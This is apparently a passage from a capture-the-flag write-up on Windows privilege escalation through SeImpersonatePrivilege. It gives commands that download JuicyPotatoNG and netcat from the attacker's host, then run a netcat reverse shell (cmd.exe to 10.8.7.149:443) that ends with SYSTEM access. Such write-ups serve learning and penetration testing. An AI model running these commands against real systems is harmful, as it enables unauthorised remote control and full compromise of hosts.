SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We see SeImpersonatePrivilege, which on a service account only means one thing... POTATO! (The original JuicyPotato no longer works on Server 2019/2022, hence JuicyPotatoNG.)
But... again, the AV proved to be the most annoying part of this box.
Now we need to get JuicyPotatoNG and netcat onto the box, served from a web server on our host; here are the methods I used:
Invoke-WebRequest -Uri http://10.8.7.149/JuicyPotatoNG.exe -OutFile C:\Windows\Temp\JuicyPotatoNG.exe
wget -UseBasicParsing http://10.8.7.149/nc64.exe -OutFile nc64.exe
Then perform the attack, with a netcat listener waiting on port 443 on our side (the command assumes JuicyPotatoNG.exe is in the current directory):
.\JuicyPotatoNG.exe -p "C:\users\svc_mssql\nc64.exe" -a "-e cmd.exe 10.8.7.149 443" -t *
PS C:\Windows\system32 > whoami
nt authority\system
